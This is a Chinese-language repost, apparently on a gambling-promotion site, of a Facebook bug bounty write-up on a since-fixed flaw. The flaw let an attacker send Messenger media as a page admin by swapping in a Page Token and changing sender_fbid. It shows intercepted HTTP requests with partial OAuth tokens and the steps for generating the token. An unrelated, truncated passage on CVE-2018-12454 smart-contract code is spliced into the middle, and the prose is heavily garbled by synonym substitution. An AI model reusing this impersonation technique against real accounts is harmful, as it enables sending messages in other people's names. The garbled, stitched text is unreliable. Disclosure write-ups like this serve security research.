Facebook 赏金$7,500的越权破绽 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Facebook 赏金$7,500的越权破绽

申博_行业观察 申博 198次浏览 未收录 0个评论

Facebook 赏金$7,500的越权破绽

附件给出了演示视频,可以或许更清楚的看出渗入测试职员的具体操纵

形貌

进击者可以或许代表Facebook Messenger上的其他用户发送媒体音讯,经由过程在Facebook页面上设置受害者治理员/编纂/主持人,然后进击者在向或人发送照片/视频/音频时阻拦信息的要求,然后将授权标头令牌变动成“Page Token”,将sender_fbid变动成受害者(治理员ID)

条件

这可以或许许可歹意用户经由过程在其页面上设置治理员(受害者)身份来代表其他用户发送音讯

破绽复现

起首:

竖立两个用户,

“Kassem Bazzoun”是进击者

“Semi Colon” 是被进击者

“Kassem Bazzoun”在他的页面上运用受害者“Semi Colon”的身份发送内容

阻拦要求

进击者可以或许在Facebook Messenger(运用Android/IOS)中发送图象/语音/视频时猎取这些要求

只需存眷Authorization Header 和参数 sender_fbid/to

发送Photos阻拦的数据包

POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk.........DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id 
to: receiver_id
Accept-Encoding: gzip, deflate

发送Video Request阻拦的数据包

POST /messenger_video/83e5ecba32f23sfd09a99f33b96529102120235284153 HTTP/1.1
X-Entity-Name: VID-20190430-WA0150.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
Authorization: OAuth EAAGNO4a7r2wBAJJXT1VkfYFfwdf9ZCpSxfcGpfi3azopoTlEvYEZC3639cIVmKefBhvKXadoD17GMt7t3Xx.........eTfcjUHvQZDZD
media_hash: 4dc51a78fd7e39ab3369ddd3873d4d1794b499621a1bd48d867c05c1a6ce65a5
X-FB-Net-HNI: 41503
attempt_id: 6529102120248812254
send_message_by_server: 4
app_id: 256002347743983
Content-Type: application/octet-stream
offline_threading_id: 65291021202332323
X-FB-Connection-Quality: GOOD
sender_fbid : victim_id

to: receiver_id
X-FB-SIM-HNI: 41503

发送Voice Message Request阻拦的数据包

/messenger_audio/a174a21348fb713ab40a796e63232fs0986529693648684848294 HTTP/1.1
X-Entity-Name: USER_SCOPED_TEMP_DATA_orca-audio-1556800271887.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/touch;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
duration: 9811
Authorization: OAuth EAADo1TDZCuu8BANUYHkTMK4SxtTRPbqtIgIuUShTWmsHujjEVIRELxlk5eiZCnA36hSgKl9gjjFJlmuMH3KYy6DlGOhojRZCDHjBZAyMEw0gLut6V4dEFaViofLKELJENiBBjW8SmMZCRho0A6Fq9ZBKXVIuf8nGPZAywnaqjunqwZDZD
X-FB-Net-HNI: 41503
attempt_id: 6529693648683742874
sender_fbid : victim_id
to: receiver_id

Kassem(进击者)经由过程从先前的 Authorization Header猎取令牌并经由过程GRAPH API EXPLORER天生页面令牌,将要求的Authorization Header中的令牌变动成他的Page Token

developers.facebook.com

要猎取页面接见令牌,请发送以下要求

CVE-2018-12454合约代码详细分析

一、漏洞概述 1000 Guess是一款基于以太坊的随机数竞猜游戏。 1000 Guess中的simplelottery智能合约实现的‘_addguess’函数存在安全漏洞,该漏洞源于程序使用公共可读取的变量生成随机值。攻击者可利用该漏洞一直获取奖励。 下面为CVE编号的详细内容。 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12454 1000 Guess作为以太坊的精彩读博游戏被爆出存在存储随机数预测漏洞。此合约通过生成随机数来预测获得大奖的钱包地址。在生成随机数的过程中,该合约通过sha256计算合约中的变量与当前数据块的信息。然而根据区块链的概念,链上的信息均是公开的,所有用户均可以获得。于是攻击者可以对此进行获取并进行投机取巧的操作。在本文中我将对合约进行详细介绍,并对此合约漏洞进行复现操作。 二、合约分析 /**
* Source Code first verified at https://etherscan.io on Saturday, November 25, 2017
(UTC) */

pragma solidity ^0.4.11;
contract simplelottery {
enum State { Started, Locked }
State public state = State.Started;
struct Guess{
address addr;
//uint guess;
}
uint arraysize=1000;
uint constan

ACCESS_TOKEN = Token for Facebook Messenger

GET/V3.2/page_id?fields=access_token

该要求应当返回

{ "access_token": "EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphkkZBv15yb7FNy357AcxAtjZCSrjFkL35muO3h3dZB2zlSZBOiS....." "id": "page_id" }

因而,用新的替代Authorization Token

注重:你应当为你和受害者治理的页面天生“Page Token”]

在将Authorization Header转换为Page Token以后,我可以或许代表页面中的任何治理员发送媒体音讯,个中服务器未搜检此符号是不是属于治理员:)若是用户具有考证此页面中的脚色(token属于此页面),而且未搜检谁天生此令牌!

以是让我们如今变动参数:)

sender_fbid

透露表现用户是向谁发送此音讯的参数(SENDER ID)

将其变动成受害者ID(治理员ID)

to

指导谁收到此音讯的参数(接收者ID)

末了发送要求!

进击

我把受害者帐户(Semi colon)的信息发给了本身!

另外,我可以或许将音讯发送给任何其他用户,不仅仅是我本身!

设想一下,有人会从您的帐户向其他用户发送音讯!

破绽修复计划

Facebook经由过程阻挠任何用户运用“页面接见令牌”代表任何治理员(包罗您的帐户)发送邮件来修复此破绽,因而页面接见令牌仅用于代表页面itselft发送邮件。新服务器复兴:err_code“:”1545003“,”err_str“:”您没法实行该操纵。“

 


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Facebook 赏金$7,500的越权破绽
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址